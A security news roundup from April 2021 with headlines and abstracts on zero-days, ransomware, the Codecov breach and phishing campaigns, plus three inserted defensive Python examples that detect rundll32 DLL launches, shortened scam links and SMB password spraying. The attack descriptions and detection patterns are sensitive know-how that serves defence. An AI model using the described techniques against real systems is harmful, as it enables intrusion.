Japanese Law Enforcement Names Chinese Military Linked Tick APT to Hundreds of Breaches Full Text
Abstract
Japanese law enforcement believes a group of hackers linked to the Chinese military are behind a broad cyber-espionage campaign that has breached more than 200 Japanese companies since at least 2016.The Record
April 21, 2021 – Vulnerabilities
QNAP fixes critical RCE vulnerabilities in NAS devices Full Text
Abstract
QNAP Systems has patched a pair of critical security vulnerabilities that could allow unauthenticated attackers to take control of its network-attached storage (NAS) devices.The Daily Swig
April 21, 2021 – Vulnerabilities
Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit Full Text
Abstract
Google on Tuesday released an update for Chrome web browser for Windows, Mac, and Linux, with a total of seven security fixes, including one flaw for which it says an exploit exists in the wild. Tracked as CVE-2021-21224 , the flaw concerns a type confusion vulnerability in V8 open-source JavaScript engine that was reported to the company by security researcher Jose Martinez on April 5 According to security researcher Lei Cao , the bug [ 1195777 ] is triggered when performing integer data type conversion, resulting in an out-of-bounds condition that could be used to achieve arbitrary memory read/write primitive. "Google is aware of reports that exploits for CVE-2021-21224 exist in the wild," Chrome's Technical Program Manager Srinivas Sista said in a blog post. The update comes after proof-of-concept (PoC) code exploiting the flaw published by a researcher named " frust " emerged on April 14 by taking advantage of the fact that the issue was addressedThe Hacker News
April 21, 2021 – IOT
UK Government Pressing Ahead with New IoT Law Amid Pandemic Smart Device Surge Full Text
Abstract
The law will impose new obligations on the manufacturers of smart devicesInfosecurity Magazine
April 21, 2021 – Vulnerabilities
3 Zero-Days in SonicWall Enterprise Email Security Appliances actively exploited Full Text
Abstract
Security vendor SonicWall has addressed three zero-day vulnerabilities affecting both its on-premises and hosted Email Security products. SonicWall is warning its customers to update their hosted and on-premises email security products to address...Security Affairs
April 21, 2021 – Business
Cape Privacy raises $20M to enable data science operations on encrypted data Full Text
Abstract
Cape Privacy, which is developing a privacy-preserving platform for collaborative data science, today announced that it closed a $20 million Series A led by Evolution Equity Partners.Venture Beat
April 21, 2021 – Attack
Codecov Supply Chain Attack May Hit Thousands: Report Full Text
Abstract
Investigators have reportedly already found hundreds of victim customersInfosecurity Magazine
April 21, 2021 – APT
China-linked APT used Pulse Secure VPN zero-day to hack US defense contractors Full Text
Abstract
At least one China-linked APT group exploited a new zero-day flaw in Pulse Secure VPN equipment to break into the networks of US defense contractors. According to coordinated reports published by FireEye and Pulse Secure, two hacking groups have...Security Affairs
April 21, 2021 – Vulnerabilities
Django Debug Toolbar tripped up by SQL injection flaw Full Text
Abstract
Users of the Django Debug Toolbar – particularly in production environments, where the potential for attack is higher – are advised to update to 1.11.1, 2.2.1, or 3.2.1.The Daily Swig
April 21, 2021 – APT
Multiple APT Groups Exploit Critical Pulse Secure Zero-Day Full Text
Abstract
Customers urged to take immediate action against nation state threatInfosecurity Magazine
April 21, 2021 – Business
Mastercard Acquires Digital Identity Verification Firm Ekata for $850 Million Full Text
Abstract
Mastercard says the plan is to combine the identity verification technology and experience of Seattle-based Ekata with its own fraud prevention and digital identity programs.Security Week
April 21, 2021 – General
MI5: 10,000+ Brits Approached by Spies on Social Site Full Text
Abstract
Intelligence agency urges caution over malicious profilesInfosecurity Magazine
April 21, 2021 – Vulnerabilities
GraphQL APIs rev up innovation – but also introduce a potential security nightmare Full Text
Abstract
It should come as no surprise that businesses have glommed onto the data sharing and monetizing benefits of APIs while overlooking the security ramifications of APIs left unprotected.Last Watchdog
April 21, 2021 – IOT
FIDO Announces New Security Standard for IoT Devices Full Text
Abstract
The protocol is designed to better enable the deployment of IoT devices at scaleInfosecurity Magazine
April 21, 2021 – Malware
Updated Hancitor Malware Slings Cobalt Strike Full Text
Abstract
TA511 achieves initial access through a malicious Word document that drops a Hancitor sample as a DLL file and executes it using rundll32, a common Living Off the Land technique.Minerva Labs
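The rundll32 pattern in that abstract (Office process drops a DLL into a user-writable directory, then runs it via rundll32) is simple to hunt for in process-creation telemetry. The following is an added example, not Minerva Labs' code: the event field names (Image, ParentImage, CommandLine, ProcessId) mirror Sysmon Event ID 1 but are an assumption, and the four sample events, including the DLL name and entry point, are constructed rather than taken from real telemetry.

```python
"""Hunt for the rundll32 Living-off-the-Land pattern: an Office parent, a DLL argument
in a user-writable path, or a DLL argument without a .dll extension.
Added example (not Minerva Labs' code); field names are assumed, events are constructed."""
import json
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Directories a standard user (and therefore a macro running as that user) can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")

# rundll32 syntax: rundll32[.exe] <dll>[,<entrypoint>] [args]; the DLL path may be quoted.
_DLL_ARG = re.compile(
    r'^\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))', re.IGNORECASE
)


def extract_dll(cmdline):
    """Return the DLL argument of a rundll32 command line, or None if there is none."""
    m = _DLL_ARG.match(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def classify(event):
    """Return the reasons a process-creation event matches the pattern (empty list = benign)."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "rundll32.exe":
        return []
    reasons = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in OFFICE_PARENTS:
        reasons.append("rundll32 spawned by Office process " + parent)
    dll = extract_dll(event.get("CommandLine", ""))
    if dll:
        low = dll.lower()
        if any(d in low for d in USER_WRITABLE):
            reasons.append("DLL loaded from user-writable path: " + dll)
        if not low.endswith(".dll"):
            # Droppers often give the DLL a misleading extension; rundll32 does not care.
            reasons.append("rundll32 argument lacks .dll extension: " + dll)
    return reasons


def hunt(json_lines):
    """Run classify() over JSON-per-line events; return [(ProcessId, reasons), ...] for hits."""
    alerts = []
    for line in json_lines:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            alerts.append((event["ProcessId"], reasons))
    return alerts


# Constructed sample telemetry: a benign Control Panel launch, two suspicious launches, one unrelated process.
SAMPLE_EVENTS = [
    r'{"ProcessId": 1, "Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}',
    r'{"ProcessId": 2, "Image": "C:\\Windows\\SysWOW64\\rundll32.exe", "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"C:\\Windows\\SysWOW64\\rundll32.exe\" C:\\Users\\alice\\AppData\\Local\\Temp\\ier.dll,EntryPoint"}',
    r'{"ProcessId": 3, "Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "rundll32 \"C:\\Users\\alice\\AppData\\Local\\Temp\\payload.tmp\",DllRegisterServer"}',
    r'{"ProcessId": 4, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}',
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS):
        print(pid, reasons)
```

Running it flags process 2 (Office parent plus a DLL under AppData) and process 3 (a Temp path with a non-.dll extension) and leaves the svchost-launched Control Panel applet alone. In production the parent check should also walk up past intermediary processes such as cmd.exe, which a macro frequently inserts between WINWORD and rundll32.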
April 21, 2021 – Business
Hypr raises $35M to grow its passwordless authentication platform Full Text
Abstract
Hypr, a cloud multifactor authentication platform, today announced it has raised $35 million in a series C round led by Advent International, doubling the company’s total funding to over $72 million.Venture Beat
April 20, 2021 – Policy and Law
House passes legislation to elevate cybersecurity at the State Department Full Text
Abstract
The House on Tuesday approved bipartisan legislation aimed at elevating cybersecurity at the State Department through prioritizing and reorganizing a key department on the heels of multiple major foreign cyberattacks against the United States.The Hill
April 20, 2021 – Government
With details sparse, vendors scramble to make sense of Biden 100-day grid security plan Full Text
Abstract
The plan, which encourages owners and operators of industrial control systems to “implement measures or technology that enhance their detection, mitigation, and forensic capabilities,” was not released in full to the public — or to many vendors who might be instrumental in actualizing key objectives.SCMagazine
April 20, 2021 – Vulnerabilities
3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances Full Text
Abstract
SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild. Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's Email Security (ES) application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021. FireEye is tracking the malicious activity under the moniker UNC2682. "These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device," researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said . The adversary leveraged these vulnerabilitieThe Hacker News
April 20, 2021 – Hacker
WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations Full Text
Abstract
If the Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch yet. At least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks. "A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, CVE-2021-22893 , are responsible for the initial infection vector," cybersecurity firm FireEye said on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances. The company is also tracking the activity under two threat clusters UNC2630 and UNC2717.The Hacker News
April 20, 2021 – General
Hillicon Valley: Biden administration kicks off 100-day plan to secure the grid | Daily Mail owner files antitrust suit against Google Full Text
Abstract
The Biden administration on Tuesday kicked off a 100-day plan to secure the electric grid amid mounting threats. Meanwhile, the parent company of the Daily Mail is suing Google over allegations that it maintained a monopoly in the ads space, and Apple unveiled a new tracking product that is raising concerns.The Hill
April 20, 2021 – Breach
Dating Service Suffers Data Breach Full Text
Abstract
Cyber-attackers gain access to Manhunt’s accounts databaseInfosecurity Magazine
April 20, 2021 – Hacker
REvil gang tries to extort Apple, threatens to sell stolen blueprints Full Text
Abstract
The REvil ransomware gang asked Apple to "buy back" stolen product blueprints to avoid having them leaked on REvil's leak site before today's Apple Spring Loaded event where the new iMac was introduced.BleepingComputer
April 20, 2021 – Botnet
QBot Replaces IcedID in Malspam Campaigns Full Text
Abstract
Cybercriminals were found shuffling payloads once again. Security analysts reported two banking trojans being used alternately to deliver various ransomware strains as the final payload in recent attacks.Cyware Alerts - Hacker News
April 20, 2021 – Breach
Multiple agencies breached by hackers using Pulse Secure vulnerabilities Full Text
Abstract
Federal authorities announced Tuesday that hackers breached multiple government agencies and other critical organizations by exploiting vulnerabilities in products from a Utah-based software company.The Hill
April 20, 2021 – Malware
Over 750,000 Users Downloaded New Billing Fraud Apps From Google Play Store Full Text
Abstract
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud. The apps in question primarily targeted users in Southwest Asia and the Arabian Peninsula, attracting a total of 700,000 downloads before they were discovered and removed from the platform. The findings were reported independently by cybersecurity firms Trend Micro and McAfee . "Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases," researchers from McAfee said in a Monday write-up. The fraudulent apps belong to the so-called " Joker " (aka Bread) malware, which has been found to repeatedly sneak past Google Play defenses over the past four years, resulting in Google removing no fewer than 1,700 infected apps from the Play Store as ofThe Hacker News
April 20, 2021 – Ransomware
School District’s Files Leaked in $40m Ransomware Attack Full Text
Abstract
Hackers leak Florida school district’s files online when their ransom demand isn’t metInfosecurity Magazine
April 20, 2021 – Government
The Cyberlaw Podcast: Cybersecurity Issues on the Congressional Agenda Full Text
Abstract
Our interview is with Mark Montgomery and John Costello, both staff to the Cyberspace Solarium Commission. The commission, which issued its main report more than a year ago, is swinging through the pitch, following up with new white papers, draft legislative language and enthusiastic advocacy fLawfare
April 20, 2021 – Hacker
Hacking a X-RAY Machine with WHIDelite & EvilCrowRF Full Text
Abstract
The popular cyber security expert Luca Bongiorni demonstrated how to hack an X-Ray Machine using his WHIDelite tool. Recently I bought an X-RAY machine from China to have some ghetto-style desktop setup in order to inspect/reverse engineer some PCBs...Security Affairs
April 20, 2021 – Hacker
Hackers exploit unpatched vulnerabilities, zero day to attack governments and contractors Full Text
Abstract
FireEye’s Mandiant team revealed ongoing exploitation of vulnerabilities in Pulse Secure VPN devices by at least two hacking groups, one of which they linked to China, to attack governments, defense contractors and other businesses in the U.S. and Europe.SCMagazine
April 20, 2021 – Vulnerabilities
Mozilla Fixes Firefox Flaw That Allowed Spoofing of HTTPS Browser Padlock Full Text
Abstract
The Mozilla Foundation releases Firefox 88, fixing 13 bugs ranging from high to low severity.Threatpost
April 20, 2021 – Vulnerabilities
SonicWall warns customers to patch 3 zero-days exploited in the wild Full Text
Abstract
Security hardware manufacturer SonicWall is urging customers to patch a set of three zero-day vulnerabilities affecting both its on-premises and hosted Email Security products.BleepingComputer
April 20, 2021 – Malware
Joker Malware Pinches 500,000 Huawei Android Users Full Text
Abstract
Roughly half a million Huawei users reportedly downloaded applications hosting the Joker malware that subscribes the victims to unwanted premium mobile services.Cyware Alerts - Hacker News
April 20, 2021 – Hacker
Threat Actor Claims to Have Hacked Domino’s Full Text
Abstract
Hacker claims to have stolen 13TBs of data from multinational pizza chain’s Indian wingInfosecurity Magazine
April 20, 2021 – Phishing
Critical update: Facebook Messenger users hit by scammers in over 80 states Full Text
Abstract
Researchers from security firm Group-IB have detected a large-scale scam campaign targeting Facebook Messenger users all over the world. Group-IB Digital...Security Affairs
April 20, 2021 – Hacker
Foreign threat actors used fake LinkedIn profiles to lure 10,000 UK nationals Full Text
Abstract
The targeting shows that humans remain the weak link in any cyber and data security strategy.SCMagazine
April 20, 2021 – Breach
GEICO Alerts Customers Hackers Stole Driver License Data for Two Months Full Text
Abstract
The second-largest auto insurance provider in the U.S. has since fixed the vulnerability that exposed information from its website.Threatpost
April 20, 2021 – Breach
Eversource Energy data breach caused by unsecured cloud storage Full Text
Abstract
Eversource, the largest power supplier in New England, has suffered a data breach after customers' personal information was exposed on an unsecured cloud server.BleepingComputer
April 20, 2021 – Ransomware
New Tactics Provide Invisibility Cloak to Ransomware Attacks Full Text
Abstract
Security experts recently discovered that ransomware groups have now upgraded to newer tools and strategies to hinder and complicate forensic investigations.Cyware Alerts - Hacker News
April 20, 2021 – APT
North Korea-linked Lazarus APT hides malicious code within BMP image to avoid detection Full Text
Abstract
North Korea-linked Lazarus APT group is abusing bitmap (.BMP) image files in a recent spear-phishing campaign targeting entities in South Korea. Experts from Malwarebytes have uncovered a spear-phishing attack conducted by a North Korea-linked Lazarus...Security Affairs
April 20, 2021 – Business
Grip Security grabs more cash to lead ‘gold rush’ to cloud security development Full Text
Abstract
The Israeli-based startup, which focuses on mapping out how cloud-based software interacts with other third party applications and other vendors, raised $6 million to help tackle the increasingly urgent security problem of software supply chain compromise.SCMagazine
April 20, 2021 – Vulnerabilities
Microsoft partially fixes Windows 7, Server 2008 vulnerability Full Text
Abstract
Microsoft has silently issued a partial fix for a local privilege escalation (LPE) vulnerability impacting all Windows 7 and Server 2008 R2 devices.BleepingComputer
April 20, 2021 – Vulnerabilities
Remote code execution vulnerabilities discovered in Cosori smart air fryer Full Text
Abstract
CVE-2020-28592 and CVE-2020-28593 are remote code execution vulnerabilities that could allow an attacker to remotely inject code into the device to change temperatures, cooking times, and settings.Cisco Talos
April 20, 2021 – Phishing
Facebook Messenger Users Targeted by Scammers Across 84 Countries Full Text
Abstract
To facilitate the moderation process in Facebook and bypass its scam filters, scammers used shortened links created with the help of such services as linktr.ee, bit.ly, cutt.us, cutt.ly, and rb.gy.Group-IB
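Because the scam links were hidden behind shorteners, a content filter that only inspects the visible host never sees the landing page; it has to expand the chain. Below is an added example, not Group-IB's code, that pulls links out of a message, recognises the shortener hosts named in the report (the list is an assumption beyond those five), and follows the redirect chain with a hop limit and loop guard. The resolver is injected so the chain can be replayed from a constructed redirect table offline; the messages and destinations are likewise constructed.

```python
"""Triage shortened links in chat messages and expand them to their landing host.
Added example (not Group-IB's code); shortener list, redirect table and messages are assumed/constructed."""
import re
from urllib.parse import urlsplit

SHORTENERS = {"linktr.ee", "bit.ly", "cutt.us", "cutt.ly", "rb.gy"}  # seeded from the report
URL_RE = re.compile(r"https?://[^\s<>\"'()]+", re.IGNORECASE)


def host_of(url):
    """Normalised host of a URL ('' if unparseable)."""
    host = urlsplit(url).hostname or ""
    return host.lower().rstrip(".")


def is_shortener(host):
    # Exact match or a subdomain of a known shortener (www.bit.ly), but not notbit.ly.
    return host in SHORTENERS or any(host.endswith("." + s) for s in SHORTENERS)


def expand(url, resolve, max_hops=5):
    """Follow shortener redirects until a non-shortener host, a dead end, a loop or max_hops.

    `resolve(url)` returns the next Location or None. A production resolver would issue a
    HEAD request with redirects disabled and read the Location header; here it is injected
    so the chain can be replayed from a table. Returns the full chain, starting with `url`."""
    chain = [url]
    while is_shortener(host_of(chain[-1])) and len(chain) - 1 < max_hops:
        nxt = resolve(chain[-1])
        if nxt is None or nxt in chain:  # dead link or redirect loop: stop, keep what we have
            break
        chain.append(nxt)
    return chain


def triage(message, resolve):
    """Return (short_url, landing_host, hops) for each shortened link found in a message.
    A landing_host that is itself a shortener means the chain could not be resolved."""
    findings = []
    for url in URL_RE.findall(message):
        if not is_shortener(host_of(url)):
            continue
        chain = expand(url, resolve)
        findings.append((url, host_of(chain[-1]), len(chain) - 1))
    return findings


# Constructed redirect table standing in for live HEAD requests; one link is chained through two shorteners.
FAKE_REDIRECTS = {
    "https://bit.ly/3xmpl": "https://cutt.ly/prz",
    "https://cutt.ly/prz": "https://prize-claim.example/fb/login",
    "https://rb.gy/loop1": "https://rb.gy/loop2",
    "https://rb.gy/loop2": "https://rb.gy/loop1",
}

SAMPLE_MESSAGE = "Is that you in this video?? https://bit.ly/3xmpl see also https://www.facebook.com/help"
LOOP_MESSAGE = "claim here https://rb.gy/loop1"

if __name__ == "__main__":
    print(triage(SAMPLE_MESSAGE, FAKE_REDIRECTS.get))
    print(triage(LOOP_MESSAGE, FAKE_REDIRECTS.get))
```

On the sample message the bit.ly link resolves through cutt.ly to prize-claim.example in two hops, while the facebook.com link is ignored; the looping rb.gy pair stops after one hop with rb.gy still as the landing host, which a filter should treat as unresolved rather than clean.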
April 20, 2021 – Vulnerabilities
Vulnerability Spotlight: Multiple vulnerabilities in Synology DiskStation Manager Full Text
Abstract
An attacker could exploit CVE-2021-26560, CVE-2021-26561, and CVE-2021-26562 with a man-in-the-middle technique to gain the ability to remotely execute code on the targeted device.Cisco Talos
April 20, 2021 – Vulnerabilities
Pulse Secure VPN zero-day used to hack defense firms, govt orgs Full Text
Abstract
Pulse Secure has shared mitigation measures for a zero-day authentication bypass vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance actively exploited against US Defense Industrial base (DIB) networks and worldwide organizations.BleepingComputer
April 20, 2021 – Vulnerabilities
Recent Chromium bug used to attack Chinese WeChat users Full Text
Abstract
A Chrome vulnerability exploit published online last week has been weaponized and used to attack WeChat users in China, local security firm Qingteng Cloud Security reported on Friday.The Record
April 20, 2021 – Government
Biden administration kicks off 100-day plan to shore up cybersecurity of electric grid Full Text
Abstract
The Biden administration on Tuesday announced it was kicking off a 100-day plan aimed at protecting the electric grid against cyberattacks.The Hill
April 20, 2021 – Hacker
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Mandiant launched a spear-phishing attack to gain a foothold in the target enterprise network using a malicious Microsoft Office email attachment and an embedded malicious link.Security Affairs
April 20, 2021 – Breach
Geico customers’ driver’s license numbers exposed in breach Full Text
Abstract
A Geico data breach that lasted over a month earlier this year exposed customers’ driver’s license numbers to hackers, according to a notice filed with California’s attorney general earlier this month.The Hill
April 20, 2021 – Malware
Fake Microsoft Store, Spotify sites spread info-stealing malware Full Text
Abstract
Attackers are promoting sites impersonating the Microsoft Store, Spotify, and an online document converter that distribute malware to steal credit cards and passwords saved in web browsers.BleepingComputer
April 20, 2021 – Criminals
Europol Report Highlights Pandemic’s Effect on Cybercrime Full Text
Abstract
Europol’s Serious Organized Crime Threat Assessment report 2021 summarizes the criminal threat of the last four years and provides insights into what to expect over the next four years.Security Week
April 20, 2021 – General
[eBook] Why Autonomous XDR Is Going to Replace NGAV/EDR Full Text
Abstract
For most organizations today, endpoint protection is the primary security concern. This is not unreasonable – endpoints tend to be the weakest points in an environment – but it also misses the forest for the trees. As threat surfaces expand, security professionals are harder pressed to detect threats that target other parts of an environment and can easily miss a real vulnerability by focusing too hard on endpoints. This is why pairing tools such as next-generation antivirus (NGAV) and endpoint detection and response (EDR) has become a popular, if flawed, choice. Fortunately, newer technologies and security methods offer much greater prevention and detection capabilities. This is the key argument of a new eBook ( download here ) offered by XDR provider Cynet. The eBook, titled Why Autonomous XDR is Going to Replace NGAV/EDR, starts with a look at how NGAV and EDR tools can defend an organization with the "assume breach" mentality – expecting a breach to occur and protecting endpoiThe Hacker News
April 20, 2021 – Malware
QR Code Malware Threat as Lockdown Ends Full Text
Abstract
Businesses urged to protect BYOD and corporate devicesInfosecurity Magazine
April 20, 2021 – Hacker
Watch out, hackers can take over your Cosori Smart Air Fryer Full Text
Abstract
Watch out, hackers could break into your home network by exploiting two remote code execution (RCE) vulnerabilities in the Cosori Smart Air Fryer. Security experts from Cisco Talos have found two remote code execution (RCE) vulnerabilities in the Cosori...Security Affairs
April 20, 2021 – General
‘Every day is game day:’ Sports psychology expert applies his skills to cybersecurity Full Text
Abstract
Derin McMains, a former professional ballplayer and peak performance coordinator for the MLB, provides guidance to ReliaQuest employees and executives on performing under pressure and staying resilient. As he told SC Media in an interview, “Pressure is a privilege… If you don’t feel pressure in what you do, it’s too easy or it doesn’t really matter to you. Who wants to do that?”SCMagazine
April 20, 2021 – Attack
Hundreds of networks reportedly hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. In new reporting, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.BleepingComputer
April 20, 2021 – General
What Are the Reasons Behind Health Data Breach Surge? Full Text
Abstract
About 70 major health data breaches have been added to the federal tally in the last four weeks as ransomware attacks have persisted and breaches at vendors have affected clients.Gov Info Security
April 20, 2021 – Breach
120 Compromised Ad Servers Target Millions of Internet Users Full Text
Abstract
An ongoing malvertising campaign tracked as "Tag Barnakle" has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware. Unlike other operators who set about their task by infiltrating the ad-tech ecosystem using "convincing personas" to buy space on legitimate websites for running the malicious ads, Tag Barnakle is "able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure," said Confiant security researcher Eliya Stein in a Monday write-up. The development follows a year after the Tag Barnakle actor was found to have compromised nearly 60 ad servers in April 2020, with the infections primarily targeting an open-source advertising server called Revive. The latest slew of attacks is no different, although the adveThe Hacker News
April 20, 2021 – Outage
Campus Still Closed as Portsmouth University Reels from Suspected Ransomware Full Text
Abstract
Planned start to the new term is delayed after cyber-attackInfosecurity Magazine
April 20, 2021 – Vulnerabilities
WeChat users targeted by hackers using recently disclosed Chromium exploit Full Text
Abstract
Threat actors used the Chrome exploit publicly disclosed last week in attacks aimed at WeChat users in China, researchers warn. China-based firm Qingteng Cloud Security reported that threat actors weaponized the recently disclosed Chrome exploit...Security Affairs
April 20, 2021 – Phishing
Spearphishing Campaign by Russian Espionage Group Gamaredon Infects Ukrainian Officials Full Text
Abstract
Russian hackers have a long history of going after organizations in Ukraine, but the Gamaredon group especially has tunnel vision for the former Soviet republic and its government officials.Cyberscoop
April 20, 2021 – Government
UK Government Reviews Nvidia-Arm Deal on National Security Fears Full Text
Abstract
Competition regulator will begin phase one investigationInfosecurity Magazine
April 20, 2021 – Business
Druva raises $147M to continue expansion of Druva Cloud Platform Full Text
Abstract
The fundraise was led by Caisse de dépôt et placement du Québec (CDPQ), a global investment group, with a significant investment by Neuberger Berman, each of which manages over $300 billion in assets.Help Net Security
April 20, 2021 – Vulnerabilities
WordPress 5.7.1 Patches XXE Flaw in PHP 8 Full Text
Abstract
WordPress has released version 5.7.1 of its popular content management system (CMS), which brings more than 25 bug fixes, including patches for two security vulnerabilities.Security Week
April 20, 2021 – Vulnerabilities
Geico Security Bug Lets Fraudsters Steal Customers’ Driver License Numbers for Months Full Text
Abstract
The insurance giant did not say how many customers were affected by the breach but said the fraudsters accessed customer driver’s license numbers between January 21 and March 1.TechCrunch
April 20, 2021 – Attack
Attackers Test Weak Passwords in Purple Fox Malware Attacks Full Text
Abstract
Weak passwords used over the Windows Server Message Block (SMB) protocol are often part of attacks that result in the spread of Purple Fox malware, Specops researchers report.Dark Reading
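The Specops finding above points at the telemetry defenders actually have for this vector: Windows Security event 4625 (failed logon) with LogonType 3 (network logon, which is what SMB authentication against a server produces), followed by a 4624 from the same source once a weak password is guessed. The Python below is an added example written for this page, not code from Specops or Dark Reading. It runs a sliding-window count of failed network logons per source address over constructed sample records, reports how many distinct accounts were tried, and notes whether a successful network logon from the same address followed the burst. The record shape, addresses, timestamps, window and threshold are all assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security-log records in the shape a SIEM export would give; not real
# telemetry. 4625 = failed logon, 4624 = successful logon, LogonType 3 = network logon,
# which is what SMB authentication against a server produces.
T0 = datetime(2021, 4, 20, 3, 0, 0)
SAMPLE_EVENTS = (
    # one source trying twelve different accounts within 90 seconds, then getting in
    [{"EventID": 4625, "LogonType": 3, "IpAddress": "10.0.0.99",
      "TargetUserName": f"user{n:02d}", "Time": T0 + timedelta(seconds=8 * n)}
     for n in range(12)]
    + [{"EventID": 4624, "LogonType": 3, "IpAddress": "10.0.0.99",
        "TargetUserName": "backup", "Time": T0 + timedelta(seconds=100)}]
    # an ordinary user mistyping a password twice, half an hour apart
    + [{"EventID": 4625, "LogonType": 3, "IpAddress": "10.0.0.7",
        "TargetUserName": "alice", "Time": T0 + timedelta(minutes=m)} for m in (1, 30)]
    # an interactive (console) failure, irrelevant to SMB
    + [{"EventID": 4625, "LogonType": 2, "IpAddress": "-",
        "TargetUserName": "bob", "Time": T0}]
)


def detect_smb_bruteforce(events, window=timedelta(minutes=5), threshold=10):
    """Flag source IPs with at least `threshold` failed network logons inside any `window`.

    Returns {ip: {"failures", "accounts", "first", "last", "success_after"}} for flagged
    sources only; "success_after" is True when a successful network logon from the same
    address landed between the start of the burst and one window after its end.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        if ev["LogonType"] != 3 or ev["IpAddress"] in ("-", ""):
            continue
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append((ev["Time"], ev["TargetUserName"]))
        elif ev["EventID"] == 4624:
            successes[ev["IpAddress"]].append(ev["Time"])

    flagged = {}
    for ip, attempts in failures.items():
        attempts.sort()
        best = None                       # (count, left, right) of the densest window
        left = 0
        for right in range(len(attempts)):
            while attempts[right][0] - attempts[left][0] > window:
                left += 1
            count = right - left + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, left, right)
        if best is None:
            continue
        count, left, right = best
        burst = attempts[left:right + 1]
        first, last = burst[0][0], burst[-1][0]
        flagged[ip] = {
            "failures": count,
            "accounts": len({user for _, user in burst}),
            "first": first,
            "last": last,
            "success_after": any(first <= t <= last + window for t in successes[ip]),
        }
    return flagged


if __name__ == "__main__":
    for ip, info in detect_smb_bruteforce(SAMPLE_EVENTS).items():
        print(f"{ip}: {info['failures']} failed network logons against {info['accounts']} "
              f"accounts between {info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}; "
              f"success afterwards: {info['success_after']}")
```

The window matters more than the raw count: two failures half an hour apart are a forgotten password, twelve in ninety seconds against twelve different accounts are a spray, and the same twelve spread over a week would only show up with a much longer window and a lower threshold.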
April 20, 2021 – General
1 in 2 Indian adults fell prey to hacking in last 12 months Full Text
Abstract
Seven in 10 Indian adults (among those surveyed) believed that remote work has made it much easier for hackers and cybercriminals to take advantage of them, a new report revealed on Monday.The Times Of India
April 20, 2021 – Hacker
Codecov hackers breached hundreds of restricted customer sites: sources Full Text
Abstract
The attackers used automation to rapidly copy customer credentials and raid additional resources, the investigators said, expanding the breach beyond the initial disclosure by Codecov on Thursday.Reuters
April 20, 2021 – Vulnerabilities
Coding error allowed attackers to delete Facebook live video Full Text
Abstract
On April 17, security researcher Ahmad Talahmeh published an advisory explaining how the vulnerability worked, together with Proof-of-Concept (PoC) code able to trigger an attack.ZDNet
April 20, 2021 – 5G
UK Government Unveils Plans to Speed Up Rollout of 5G Technology Full Text
Abstract
Under the proposals, it will be easier to introduce 5G-connected technology, particularly in rural areas.Infosecurity Magazine
April 20, 2021 – Attack
Hundreds of customer networks hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. Sources state hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.BleepingComputer
April 20, 2021 – Hacker
North Korean hackers adapt web skimming for stealing Bitcoin Full Text
Abstract
Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say.BleepingComputer
April 20, 2021 – Criminals
Crooks stole driver’s license numbers from Geico auto insurer Full Text
Abstract
Car insurance provider Geico has suffered a data breach in which attackers stole policyholders' driver's license numbers over a period of several weeks. Geico, the second-largest auto insurer in the U.S., has suffered a data breach, threat actors exploited...Security Affairs
